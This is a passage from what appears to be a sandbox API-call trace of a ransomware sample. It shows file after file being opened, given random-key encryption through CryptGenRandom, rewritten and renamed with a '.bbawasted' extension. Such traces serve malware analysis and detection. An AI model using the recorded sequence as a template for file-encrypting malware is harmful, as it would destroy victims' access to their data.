(normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0069.029] WriteFile (in: hFile=0xf8, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0069.030] SetEndOfFile (hFile=0xf8) returned 1 [0069.030] SetFilePointer (in: hFile=0xf8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.030] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.030] lstrcpyW (in: lpString1=0x5a50a6, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.030] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.bbawasted")) returned 1 [0069.031] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml.bbawasted" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0069.031] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0069.031] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x2213 [0069.031] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2213) returned 0x570000 [0069.031] CloseHandle (hObject=0xfc) returned 1 [0069.033] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0069.034] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.034] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.034] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0069.035] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0069.035] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.043] SetEndOfFile (hFile=0xf8) returned 1 [0069.045] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.045] CloseHandle (hObject=0xf8) returned 1 [0069.047] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a5008 | out: hHeap=0x580000) returned 1 [0069.047] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bea40 | out: hHeap=0x580000) returned 1 [0069.047] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0069.099] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0069.099] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.099] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 66 [0069.099] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28e) returned 0x5bf070 [0069.099] lstrcpyW (in: lpString1=0x5bf0f4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.099] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5e1fb0 [0069.099] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0069.100] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5e1fb0 | out: pbBuffer=0x5e1fb0) returned 1 [0069.100] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0069.100] WriteFile (in: hFile=0x120, lpBuffer=0x5e1fb0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5e1fb0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0069.101] SetEndOfFile (hFile=0x120) returned 1 [0069.101] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.101] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5e1fb0 | out: hHeap=0x580000) returned 1 [0069.101] lstrcpyW (in: lpString1=0x5bf0f4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.102] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.bbawasted")) returned 1 [0069.142] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0069.142] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0069.142] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x49a [0069.142] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x49a) returned 0x570000 [0069.142] CloseHandle (hObject=0xf8) returned 1 [0069.144] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0069.145] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.145] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.145] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0069.146] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0069.146] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.154] SetEndOfFile (hFile=0x120) returned 1 [0069.156] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.156] CloseHandle (hObject=0x120) returned 1 [0069.158] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0069.158] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5a3ef8 | out: hHeap=0x580000) returned 1 [0069.158] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0069.159] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0069.159] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.159] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned 63 [0069.159] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x288) returned 0x5bf070 [0069.159] lstrcpyW (in: lpString1=0x5bf0ee, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.159] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0069.159] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0069.160] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0069.160] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0069.160] WriteFile (in: hFile=0x120, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0069.161] SetEndOfFile (hFile=0x120) returned 1 [0069.161] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.161] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.161] lstrcpyW (in: lpString1=0x5bf0ee, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.161] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.bbawasted")) returned 1 [0069.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0069.163] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0069.163] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x499 [0069.163] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x499) returned 0x570000 [0069.163] CloseHandle (hObject=0xfc) returned 1 [0069.165] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0069.166] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.166] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.166] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0069.166] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0069.166] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.206] SetEndOfFile (hFile=0x120) returned 1 [0069.208] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.208] CloseHandle (hObject=0x120) returned 1 [0069.209] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0069.209] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b91f8 | out: hHeap=0x580000) returned 1 [0069.210] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0069.210] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0069.210] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.210] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 64 [0069.210] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28a) returned 0x5bf070 [0069.211] lstrcpyW (in: lpString1=0x5bf0f0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.211] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0069.211] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0069.211] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0069.211] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.211] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0069.212] WriteFile (in: hFile=0x120, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0069.213] SetEndOfFile (hFile=0x120) returned 1 [0069.213] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.213] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.213] lstrcpyW (in: lpString1=0x5bf0f0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.213] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.bbawasted")) returned 1 [0069.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0069.215] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0069.215] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x494 [0069.215] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x494) returned 0x570000 [0069.215] CloseHandle (hObject=0xf8) returned 1 [0069.217] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0069.218] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0069.218] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.218] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0069.218] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0069.218] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.227] SetEndOfFile (hFile=0x120) returned 1 [0069.229] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.229] CloseHandle (hObject=0x120) returned 1 [0069.231] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0069.231] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf958 | out: hHeap=0x580000) returned 1 [0069.231] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0069.231] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0069.232] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.232] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0jGywidWNCSY.odp") returned 58 [0069.232] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27e) returned 0x5bf070 [0069.232] lstrcpyW (in: lpString1=0x5bf0e4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.232] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0069.232] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0069.232] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0069.232] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.232] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0jGywidWNCSY.odp.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0jgywidwncsy.odp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0069.234] WriteFile (in: hFile=0x120, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0069.234] SetEndOfFile (hFile=0x120) returned 1 [0069.248] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.248] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.248] lstrcpyW (in: lpString1=0x5bf0e4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.248] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0jGywidWNCSY.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0jgywidwncsy.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0jGywidWNCSY.odp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0jgywidwncsy.odp.bbawasted")) returned 1 [0069.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0jGywidWNCSY.odp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0jgywidwncsy.odp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0069.249] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0069.249] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0xf9fdd4 | out: lpFileSizeHigh=0xf9fdd4*=0x0) returned 0x12af7 [0069.249] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12af7) returned 0xfe0000 [0069.249] CloseHandle (hObject=0xfc) returned 1 [0069.284] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0069.285] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5be908 | out: pbBuffer=0x5be908) returned 1 [0069.285] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.285] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0069.286] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0069.286] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.294] SetEndOfFile (hFile=0x120) returned 1 [0069.297] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.297] CloseHandle (hObject=0x120) returned 1 [0069.298] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0069.299] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bfa38 | out: hHeap=0x580000) returned 1 [0069.299] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0069.299] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0069.299] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.299] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5fD7Sq2zCyeh.bmp") returned 58 [0069.299] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27e) returned 0x5bf070 [0069.300] lstrcpyW (in: lpString1=0x5bf0e4, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0069.300] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c4538 [0069.300] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0069.300] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c4538 | out: pbBuffer=0x5c4538) returned 1 [0069.300] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0069.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5fD7Sq2zCyeh.bmp.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5fd7sq2zcyeh.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0069.301] WriteFile (in: hFile=0x120, lpBuffer=0x5c4538*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5c4538*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0069.302] SetEndOfFile (hFile=0x120) returned 1 [0069.303] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.303] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c4538 | out: hHeap=0x580000) returned 1 [0069.303] lstrcpyW (in: lpString1=0x5bf0e4, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0069.303] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5fD7Sq2zCyeh.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5fd7sq2zcyeh.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5fD7Sq2zCyeh.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5fd7sq2zcyeh.bmp.bbawasted")) returned 1 [0069.304] CreateFileW 